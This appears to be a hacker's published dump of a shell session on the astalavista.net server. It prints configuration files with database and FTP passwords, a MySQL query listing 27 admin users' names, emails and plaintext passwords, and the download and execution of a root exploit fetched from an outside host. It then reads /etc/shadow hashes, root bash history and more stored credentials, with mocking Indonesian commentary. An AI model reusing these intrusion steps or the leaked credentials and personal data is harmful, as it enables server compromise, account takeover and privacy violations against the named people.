-rw-r--r--  1 astanet astanet 25724 Apr  4  2006 banner.jpg

drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config

drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron

drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd

-rw-r--r--  1 astanet astanet    36 Jan  5  2006 error.php

-rw-r--r--  1 astanet astanet  1406 Jan  5  2006 favicon.ico

drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed

drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour

-rw-r--r--  1 astanet astanet    18 Jan  5  2006 htaccess

-rw-r--r--  1 astanet astanet   585 Mar 24 14:50 .htaccess

-rw-r--r--  1 astanet astanet   398 Jan  5  2006 index1.php

-rw-r--r--  1 astanet astanet  1036 Jan  5  2006 _index.html

-rw-r--r--  1 astanet astanet  6880 Dec 23 14:44 index.php

-rw-r--r--  1 astanet astanet   676 Mar 21  2006 index_redirect.php

-rw-r--r--  1 astanet astanet   739 Feb 24  2006 index.swf

drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc

drwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang

drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib

drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log

drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member

drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata

drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new

-rw-r--r--  1 astanet astanet  7219 Feb 24  2006 pix1.swf

drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re

-rw-r--r--  1 astanet astanet    23 Jan  5  2006 robots.txt

drwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss

drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources

drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com

drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes

drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src

drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl

drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2

drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old

-rw-r--r--  1 astanet astanet    35 Dec  4  2006 webcash.php

drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki



sh-3.2$ head -20 index.php

/**

* Mainfile (external) for astalavistaNET v2.0

*

* @copyright     Astalavista IT Engineering GmbH

* @author        Thomas Kaelin 

* @version       1.0

*/



        if ($_SERVER['PHP_SELF'] == '/webcash.php') {

                $dontStartSession = false;

        } else {

                $dontStartSession = true;

        }

        require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');

        require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');

        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');

        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');



sh-3.2$ cd config

sh-3.2$ ls -la

total 32

drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .

drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..

-rw-r--r--  1 astanet astanet  987 Aug 11  2006 adm.conf.php

-rw-r--r--  1 astanet astanet 4937 Dec 23 15:48 com.conf.php

-rw-r--r--  1 astanet astanet  913 Aug 11  2006 cron.conf.php

-rw-r--r--  1 astanet astanet 1668 Aug 20  2008 ext.conf.php

-rw-r--r--  1 astanet astanet 2724 May 30  2007 int.conf.php



sh-3.2$ cat com.conf.php

[snip]

//member-database

$_CONFIG['db_mem_server']       = 'localhost';

$_CONFIG['db_mem_database'] = 'astanet_membersystem';

$_CONFIG['db_mem_user']         = 'astanet_db';

$_CONFIG['db_mem_password'] = 'TXwVrC7hbq';

$_CONFIG['db_mem_debug']        = false; //true or false

//ads-database

$_CONFIG['db_ads_server']       = 'localhost';

$_CONFIG['db_ads_database'] = 'astanet_ads';

$_CONFIG['db_ads_user']         = 'astanet_db';

$_CONFIG['db_ads_password'] = 'TXwVrC7hbq';

$_CONFIG['db_ads_debug']        = false; //true or false

//rainbow-database

$_CONFIG['db_rainbow_server']   = '212.254.194.163';

$_CONFIG['db_rainbow_database'] = 'rainbow';

$_CONFIG['db_rainbow_user']     = 'dinu';

$_CONFIG['db_rainbow_password'] = 'dinudinu';

$_CONFIG['db_rainbow_debug']    = false; //true or false

//mailing lists database

$_CONFIG['db_mailing_lists_server']     = 'localhost';

$_CONFIG['db_mailing_lists_database']   = 'astanet_mailing_lists';

$_CONFIG['db_mailing_lists_user']               = 'astanet_db';

$_CONFIG['db_mailing_lists_password']   = 'TXwVrC7hbq';

$_CONFIG['db_mailing_lists_debug']              = false; //true or false

//paypal

$_CONFIG['sub_pp_url']          = 'https://www.paypal.com/cgi-bin/webscr';

$_CONFIG['sub_pp_cmd']          = '_xclick';

$_CONFIG['sub_pp_business'] = 'info@astalavista.net';

$_CONFIG['sub_pp_noship']       = '1';

$_CONFIG['sub_pp_referer']      = 'https://www.paypal.com/';

[snip]



sh-3.2$ cd ..

sh-3.2$ cd member

sh-3.2$ ls -la

total 20

drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .

drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..

-rw-r--r--  1 astanet astanet   19 Jan 13 14:02 .htaccess

-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php

sh-3.2$ cat .htaccess

SecFilterEngine off



sh-3.2$ cd ..

sh-3.2$ cd cron

sh-3.2$ ls -la

total 168

drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .

drwxr-x--- 29 astanet apache   4096 Jan  6 13:58 ..

-rw-r--r--  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php

-rw-r--r--  1 astanet astanet  2356 Aug 11  2006 0_functions.php

-rw-r--r--  1 astanet astanet  3616 Dec 23 15:44 1_daily.php

-rw-r--r--  1 astanet astanet   527 Aug 11  2006 1_fivemin.php

-rw-r--r--  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php

-rw-r--r--  1 astanet astanet   432 Aug 11  2006 1_weekly.php

-rw-r--r--  1 astanet astanet  2277 Aug 11  2006 2_advertising.php

-rw-r--r--  1 astanet astanet  4882 Dec 23 15:40 2_archives.php

-rw-r--r--  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh

-rw-r--r--  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php

-rw-r--r--  1 astanet astanet 14979 Jan 12 09:10 2_expire.php

-rw-r--r--  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php

-rw-r--r--  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh

-rw-r--r--  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php

-rw-r--r--  1 astanet astanet 15664 Sep 22  2006 2_keywords.php

-rw-r--r--  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php

-rw-r--r--  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php

-rw-r--r--  1 astanet astanet   796 Aug 11  2006 99_create_emails.php

drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email

-rw-r--r--  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php

-rw-r--r--  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php



sh-3.2$ cd ..

sh-3.2$ cd _007

sh-3.2$ ls -la

total 24

drwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .

drwxr-x--- 29 astanet apache  4096 Jan  6 13:58 ..

-rw-r--r--  1 astanet astanet   96 Dec 23 15:17 .htaccess

-rw-r--r--  1 astanet astanet 3263 Jan 15  2007 index.php

-rw-r--r--  1 astanet astanet   20 Dec 27  2006 info.php

drwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap



sh-3.2$ cat  .htaccess

authType Basic

authName Admin

authUserFile /home/astanet/auth/.htadm_pwd

require valid-user



sh-3.2$ cat /home/astanet/auth/.htadm_pwd

admin2net:CR0bl65MwhfT



sh-3.2$ mysql -u astanet_db -p

Enter password:

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 275153

Server version: 5.0.45-community-log MySQL Community Edition (GPL)



Type 'help;' or '\h' for help. Type '\c' to clear the buffer.



mysql> show databases;

+-----------------------+

| Database              |

+-----------------------+

| information_schema    |

| astanet_ads           |

| astanet_mailing_lists |

| astanet_mediawiki     |

| astanet_membersystem  |

| test                  |

+-----------------------+

6 rows in set (0.00 sec)



mysql> use astanet_membersystem

Database changed

mysql> show tables;

+-----------------------------------+

| Tables_in_astanet_membersystem    |

+-----------------------------------+

| blacklist_categories              |

| blacklist_content                 |

| blacklist_levels                  |

| blacklist_mcset                   |

| dir_categories                    |

| dir_comments                      |

| dir_links                         |

| dir_temp                          |

| dir_votes                         |

| documents                         |

| documents_categories              |

| email_content                     |

| email_settings                    |

| exploits                          |

| exploits_categories               |

| exploittree_categories            |

| exploittree_exploits              |

| home_values                       |

| iso_countries                     |

| links_categories                  |

| links_records                     |

| links_unauth                      |

| links_votes                       |

| log                               |

| news_categories                   |

| news_comments                     |

| news_emoticons                    |

| news_latest                       |

| news_messages                     |

| news_statistics                   |

| news_votes                        |

| prices_content                    |

| prices_offers                     |

| rss_settings                      |

| sessions                          |

| stats_signups                     |

| u2u2                              |

| u2u_contact                       |

| u2u_settings                      |

| user_keywords_selected_categories |

| users                             |

| users_ipn_test                    |

| users_keyword_values              |

| users_profile                     |

| users_temp                        |

| users_upgrade                     |

+-----------------------------------+

46 rows in set (0.00 sec)



mysql> describe users;

+--------------------------+--------------------------------------+------+-----+---------------------+----------------+

| Field                    | Type                                 | Null | Key | Default             | Extra          |

+--------------------------+--------------------------------------+------+-----+---------------------+----------------+

| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |

| user                     | varchar(50)                          | NO   |     |                     |                |

| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |

| password                 | varchar(30)                          | NO   |     |                     |                |

| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |

| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |

| email                    | varchar(50)                          | NO   |     |                     |                |

| ip                       | varchar(15)                          | NO   |     | 0                   |                |

| proxy                    | set('0','1')                         | NO   |     | 0                   |                |

| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |

| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |

| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |

| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |

| checked                  | set('0','1','2')                     | NO   |     | 0                   |                |

| freemember               | set('0','1')                         | NO   |     | 0                   |                |

| ordertype                | set('transfer','wp','pp','mc','CnB') | YES  |     | NULL                |                |

| lang                     | tinytext                             | NO   |     |                     |                |

| adid                     | smallint(6)                          | NO   |     | 0                   |                |

| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |

| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |

| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |

| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |

+--------------------------+--------------------------------------+------+-----+---------------------+----------------+

22 rows in set (0.01 sec)



mysql> select count(*) as skids from users;

+-------+

| skids |

+-------+

| 25199 |

+-------+

1 row in set (0.00 sec)



mysql> select user,nickname,password,email from users where userlevel = 1;

+--------------------------+----------------------+------------------+-----------------------------------+

| user                     | nickname             | password         | email                             |

+--------------------------+----------------------+------------------+-----------------------------------+

| pascal                   | prozac               | astaman3         | info@astalavista.net              |

| Ivan Schmid              | rOOtless1            | astalavista4asta | ivan.schmid@comvation.com         |

| qreymer                  | Palermo              | qblsw85iam       | eche@home.se                      |

| Christian Wehrli         | g0atherd             | hitt?74          | g0atherd@gmx.net                  |

| Andrew Blake             | Minky                | liq73uid         | a.blake@har.mrc.ac.uk             |

| Martin Wyss              | dinu                 | kj63;cXy         | martin.wyss@astalavista.net       |

| Leandro Nery             | Timan_no_Sanco       | nery2002         | leandronery@hotmail.com           |

| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | shavingryansprivates1@hotmail.com |

| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | spoofedexistence@hotmail.com      |

| David M Lee              | Daremo               | icG12m03         | daremo@hackerheaven.com           |

| David Corn               | akriel               | ve3uB$cUku       | akriel@fallenroot.net             |

| Thomas Kalin             | Gwanun               | QwErTy123        | thomas.kaelin@astalavista.net     |

| Marcus unknown           | Cra58cker            | hhCr4ck06        | unknownmarcus@hotmail.com         |

| David Ellis              | dellis203            | philip           | dellis@nightwatchnss.com          |

| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | xeor@hush.com                     |

| Paulo Santos             | Be1er0ph0r1          | amor01           | pmsantos@gmx.ch                   |

| Thomas D?ppen            | daha                 | asta4tom         | thomas.daeppen@astalavista.ch     |

| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | toraj.a.m@gmail.com               |

| Fabius Bernet            | traviser             | wellenreiter100  | fabius.bernet@astalavista.ch      |

| Zachary McElroy          | duder1               | dirty245dix      | mcelroyzj@yahoo.com               |

| Leron Cohen              | cohen2               | leron4free       | leron@quiredmedia.com             |

| Beatriz Pontes           | anonymous1656        | pitas            | joao.pedro.pontes@gmail.com       |

| Glafkos Charalambous     | anonymous2086        | si99490178$#     | nowayout@webhostline.com          |

| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | ivan.schmid@astalavista.ch        |

| Peter Fisher             | cyph3r1              | testZer025435    | cyph3r@astalavista.com            |

| sykadul                  | sykadul              | ak29eral         | sykadul@gmail.com                 |

| Ronny Janzi              | commander1           | mpbdaagf6m       | ronny.janzi@astalavista.ch        |

+--------------------------+----------------------+------------------+-----------------------------------+

27 rows in set (0.00 sec)



mysql> exit;

Bye

===========================================================

ini dia user pass si admin yang berupa plain text . 

sangat ironi sekali kedengarannya .

situs IT PROFESIONAL menggunakan Plain text password . heuheuheu :P

LANJUT :P

===========================================================

sh-3.2$ uname -a

Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2$ wget http://anti.sec.labs/g0troot

--13:33:37--  http://anti.sec.labs/g0troot

Resolving anti.sec.labs... 13.33.33.37

Connecting to anti.sec.labs|13.33.33.37|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 18200 (18K) [text/plain]

Saving to: `g0troot'



100%[=======================>] 18,200      58.6K/s   in 

0.3s



18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]



sh-3.2$ ./g0troot -i x86_64

	[+] g0troot - anti.sec.labs

	[+] Target: 2.6.18-128.1.10.el5

	[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

	

	[+] r00tr00t

	[~] Executing shell...

	

sh-3.2# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)



sh-3.2# cat /etc/shadow

root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::

[snip]

admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::

jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::

com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::

astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::



sh-3.2# cat /etc/motd

#####################################################

#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #

# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #

# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #

#                                                   #

#####################################################

#                                                   #

# Admin Contact - support@secureservertech.com      #

#                                                   #

# Available ShortCuts                               #

#                                                   #

# nst -  list active connections                    #

# ddos - shows how many times each ip is connected  #

# ltr -  restart the webserver                      #

# phpc - edit the php config file                   #

# htc -  edit the webserver configuration file      #

# up -   uptime                                     #

# etd - edit the motd of the day file               #

# htr - start and restart apache if needed          #

# syng - shows active SYN_RECV connections          #

# synd - syn flood blocker - "synd -h" for usage    #

#####################################################

# NOTES:                                            #

# Last Upgrade - 12-08-2008 by JF                   #

# My.cnf/Mysql Optimization - 1-28-09               #

#                                                   #

#                                                   #

#                                                   #

#####################################################



sh-3.2# lastlog | grep -v Never

Username         Port     From             Latest

root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009

admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008

com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009

astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009



sh-3.2# ls -la

total 453376

drwxr-x--- 15 root root       4096 Jun  4 08:40 .

drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..

-rw-r--r--  1 root root    2394400 Oct 19  2007 10mbtest.zip

-rw-------  1 root root       1006 Sep 11  2007 anaconda-ks.cfg

-rw-------  1 root root      16836 Jun  4 07:21 .bash_history

-rw-r--r--  1 root root         24 Jan  6  2007 .bash_logout

-rw-r--r--  1 root root        191 Jan  6  2007 .bash_profile

-rw-r--r--  1 root root        176 Jan  6  2007 .bashrc

-rwx------  1 root root       1899 Oct 28  2007 bk.sh

-rw-r--r--  1 root root       1327 Nov 29  2007 cert

-rw-r--r--  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql

drwxr-xr-x  4 root root       4096 May 20  2008 .cpan

-rw-r--r--  1 root root        100 Jan  6  2007 .cshrc

-rw-r--r--  1 root root     323079 Mar 31 13:48 defaultp_ports.sql

drwx------  2 root root       4096 Oct 28  2007 .elinks

drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1

-rw-r--r--  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2

-rw-------  1 root root          0 Apr 16 13:19 .history

-rw-r--r--  1 root root      16095 Sep 11  2007 install.log

-rw-r--r--  1 root root       2566 Sep 11  2007 install.log.syslog

-rw-r--r--  1 root root       1003 Jul 22  2007 install.sh

-rw-------  1 root root         35 Jun  2 14:23 .lesshst

drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp

drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec

-rw-r--r--  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz

-rw-r--r--  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2

-rwx------  1 root root        760 Sep 18  2008 lp

drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1

-rw-r--r--  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz

-rw-r--r--  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1

drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9

-rw-r--r--  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz

drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3

-rw-r--r--  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz

-rw-r--r--  1 root root      25316 Feb 15  2006 mybk.sh

-rw-------  1 root root         41 Oct 19  2007 .my.cnf

-rw-------  1 root root       2902 Jun  4 08:40 .mysql_history

-rwx------  1 root root      38873 Apr 16  2008 mysqlreport

-rw-------  1 root root         41 May 20  2008 .mytop

drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6

-rw-r--r--  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz

drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp

-rw-------  1 root root       1462 Sep 21  2007 opt.php

-rw-r--r--  1 root root       3371 Sep 22  2007 p

-rw-r--r--  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2

-rw-------  1 root root       1024 Feb  3 21:32 .rnd

-rw-r--r--  1 root root        716 Nov 28  2007 server.csr

-rw-r--r--  1 root root        887 Nov 28  2007 server.key

drwx------  2 root root       4096 Oct 10  2008 .ssh

-rw-r--r--  1 root root      44227 Oct 28  2007 tar-inc-backup.dat

-rw-r--r--  1 root root        129 Jan  6  2007 .tcshrc

-rw-r--r--  1 root root  104874307 Oct 17  2007 test100.zip

-rw-r--r--  1 root root   67085540 Oct 19  2007 test100.zip.1

drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp

-rw-r--r--  1 root root      42596 May 21  2007 tuning-primer.sh

drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0

-rw-r--r--  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2

-rw-------  1 root root      12997 May 16  2008 .viminfo



sh-3.2# cat .bash_history

[snip]

wget cp4sst.com/sstlinux.tar.gz

tar zxvf sstlinux.tar.gz

cd linux-2.6.27.10

sh install.sh

make bzImage ; make modules ; make modules_install ; make install

make clean

service mysqld restart

[snip]

cd /usr/sbin/

chmod 4777 traceroute

chmod 4777 ping

traceroute -I www.astalavista.ch

[snip]

vi /etc/csf/csf.conf

traceroute google.ch

service csf restart

tracert google.ch

service csf restart

traceroute www.google.ch

tracert www.google.ch

traceroute www.google.ch

locate traceroute

chown 4755 /bin/traceroute

chown 4777 /bin/traceroute

locate ping

chown 4755 /bin/ping

chown 4777 /bin/ping

cd /bin/

ls -ali | grep ping

chown root ping

chmod 4755 ping

ls -ali | grep traceroute

chown root traceroute

chmod 4755 traceroute

ls -ali | grep traceroute

traceroute -I www.google.ch

traceroute www.google.ch

whois pmsantos.ch

[snip]

mysql -h com_contrexx2_live < /root/defaultp_ports.sql

mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql

mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql

mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql

top

ping ssth.ch

ping asdlkfaljgasd???ljg???lasj.ch

ping asdlkfaljgasdlasj.ch

ping www.ssth.ch

ping ssth.ch

nslookup www.google.ch

nslookup www.ssth.ch

man nslookup

ping www.google.ch

nslookup www.google.ch

nslookup www.google.ch

nslookup salfjasdlf.ch

[snip]

openssl passwd -1 sadf

openssl passwd -1 5cZNHstdTy

mysql

mysql

locate proftp

vi /etc/proftpd.passwd

service proftpd restart

locate proftpd.conf

vi /etc/proftpd.conf

vi /etc/proftpd.passwd

service proftpd restart

[snip]

/bin/sh /home/com/backup_system/backup.sh

tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin

mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql

mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql

ls -ali

mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql

mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql

crontab -l

crontab -l

php -q /home/com/public_html/modifications/cronjobs/securitynews.php

/home/com/public_html/modifications/cronjobs/exploits.sh

wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz

tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz

cd lsws-4.0.3

sh install.sh

uptime

hdparm -tt /dev/sda

iostat

yum install iostat

iostat

whereis iostat

yjm clean all

yum clean all ; yum -y update

iostat

yum install systat

rpm -qa | grep iostat

rpm -qa | grep sysstat

rpm -qa | grep systat

dmesg -c

sysctl -p

uname -r

cd /usr/src

wget nix101.com/kernels/sstlinux.tar.gz

shutdown -r now

nano -w /boot/grub/grub.conf



sh-3.2# cat .my.cnf

[client]

user=da_admin

password=X9dctmRH



sh-3.2# cat /home/com/backup_system/backup.sh

#!/bin/sh

##########################################################

#                                                        #

#   incremental backup for astalavista.com               #

#                                                        #

# author: Paulo M. Santos  #

#                                                        #

##########################################################

[snip]

PROG_DIR="/home/com/backup_system";

BACKUP_DIR="/home/com/backups";

DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";

# ftp for synology backup server

FTP_HOST="212.254.194.163";

FTP_PORT="21";

FTP_USER="astalavista.com";

FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";

FTP_DIR="/astalavista.com";

# database

DB_HOST="localhost";

DB_USER="contrexxuser2";

DB_PASS="0fEYNZgXz1pKe";

DB_DATABASE1="com_contrexx2_live";

DB_DATABASE2="com_contrexx2";

[snip]

ftp -in $FTP_HOST $FTP_PORT <quote USER $FTP_USER

quote PASS $FTP_PASS

cd $FTP_DIR

put $DB_FULLNAME-SQL_Dump.tar

put $BACKUP_FULLNAME-Public_HTML.tar

close

bye

EOF



sh-3.2# cd /home

sh-3.2# ls -la

total 120

drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .

drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..

drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin

-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group

-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user

drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet

drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup

drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161

drwx--x--x 10 com     com      4096 Apr 28 12:40 com

drwxr-xr-x  2 root    root     4096 May 17  2007 ftp

drwx------  3 jon     jon      4096 Sep 21  2007 jon

drwx------  2 root    root    16384 Sep 11  2007 lost+found

drwxr-xr-x  2 root    root     4096 Sep 14  2007 my

drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata

drwx------  2 jon     jon      4096 Sep 15  2007 test

drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp



sh-3.2# cd admin

sh-3.2# ls -la

total 1735896

drwx--x--x  9 admin admin       4096 Nov 28  2007 .

drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..

drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups

drwx------  2 admin admin       4096 Sep 28  2007 backups

-rw-------  1 admin admin        860 Sep 17  2008 .bash_history

-rw-r--r--  1 admin admin         24 Sep 14  2007 .bash_logout

-rw-r--r--  1 admin admin        176 Sep 14  2007 .bash_profile

-rw-r--r--  1 admin admin        124 Sep 14  2007 .bashrc

drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups

drwx--x--x  6 admin admin       4096 Sep 21  2007 domains

drwxrwx---  3 admin mail        4096 Sep 21  2007 imap

-rw-r--r--  1 root  root          24 Sep 21  2007 info.php

drwx------  2 admin admin       4096 Sep 21  2007 mail

-rw-r--r--  1 root  root         716 Nov 28  2007 server.csr

-rw-r--r--  1 root  root         887 Nov 28  2007 server.key

-rw-r-----  1 admin mail          34 Sep 14  2007 .shadow

-rw-r-----  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz

drwx--x--x  2 admin admin       4096 Jul 29  2008 user_backups



sh-3.2# ..

sh-3.2# cd jon

sh-3.2# ls -la

total 36

drwx------  3 jon  jon  4096 Sep 21  2007 .

drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..

-rw-------  1 jon  jon    53 Sep 21  2007 .bash_history

-rw-r--r--  1 jon  jon    24 Sep 21  2007 .bash_logout

-rw-r--r--  1 jon  jon   176 Sep 21  2007 .bash_profile

-rw-r--r--  1 jon  jon   124 Sep 21  2007 .bashrc

-rw-r--r--  1 root root   24 Sep 21  2007 info.php

drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html



sh-3.2# cd ..

sh-3.2# cd test

sh-3.2# ls -la

total 48

drwx------  2 jon  jon  4096 Sep 15  2007 .

drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..

-rw-------  1 jon  jon    79 Sep 21  2007 .bash_history

-rw-r--r--  1 jon  jon    24 Sep 15  2007 .bash_logout

-rw-r--r--  1 jon  jon   176 Sep 15  2007 .bash_profile

-rw-r--r--  1 jon  jon   124 Sep 15  2007 .bashrc

sh-3.2# cat .bash_history

/usr/bin/mysqladmin -u root password PoliuJhytg67



sh-3.2# cd ..

sh-3.2# cd astanet

sh-3.2# ls -la

total 52

drwx--x--x  6 astanet astanet 4096 Jun  4 09:51 .

drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..

drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth

-rw-------  1 astanet astanet 3892 Apr 16 12:14 .bash_history

-rw-r--r--  1 astanet astanet   33 Dec 17 21:50 .bash_logout

-rw-r--r--  1 astanet astanet  176 Dec 17 21:50 .bash_profile

-rw-r--r--  1 astanet astanet  124 Dec 17 21:50 .bashrc

drwx--x--x  3 astanet astanet 4096 Dec 23 12:18 domains

drwxrwx---  3 astanet mail    4096 Dec 23 12:18 imap

drwx------  2 astanet astanet 4096 Dec 23 12:18 mail

-rw-------  1 astanet astanet  197 Jun  4 09:51 .mysql_history

lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html

-rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow



sh-3.2# cd auth/

sh-3.2# ls -la

total 28

drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .

drwx--x--x 6 astanet astanet 4096 Jun  4 09:51 ..

-rw-r--r-- 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php

-rw-r--r-- 1 root    root     319 Jan  5  2006 hosting.config.inc.php

